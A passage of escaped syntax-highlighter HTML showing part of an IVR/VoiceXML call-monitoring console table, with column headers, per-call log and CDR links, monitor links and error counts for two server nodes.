class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">call<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort_calls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">luri<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Local<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">URI<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-58\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">call<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort_calls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">severe<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Severes<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-59\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">call<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort_calls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">warning<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Warnings<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-60\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">call<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort_calls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxml_exception<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">VoiceXML <\/span><span class=\"crayon-v\">Exceptions<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-61\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">call<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort_calls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">time<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Started <\/span><span class=\"crayon-v\">At<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-63\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Duration<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-64\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-65\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-66\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-67\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-68\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">tr <\/span><span class=\"crayon-v\">bgcolor<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;eeeeee&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">tb0ocmp1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_3<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CDR<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;call.do?action=monitor&amp;cid=vxi_dialog_0_32_634_3&amp;node=tb0ocmp1&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Monitor<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;service.do?action=update&amp;id=o2_ivr_0xxx&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">o2_ivr_0xxx<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">sip<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">unavailable<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">unknown<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">invalid<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1542000470521123<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">ERROR <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">WARN <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">vxml_exception <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">150909<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">52.429<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00.502<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">tb0ocmp0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_2<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CDR<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;call.do?action=monitor&amp;cid=vxi_dialog_0_40_420_2&amp;node=tb0ocmp0&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Monitor<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;service.do?action=update&amp;id=o2_ivr_0xxx&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">o2_ivr_0xxx<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span 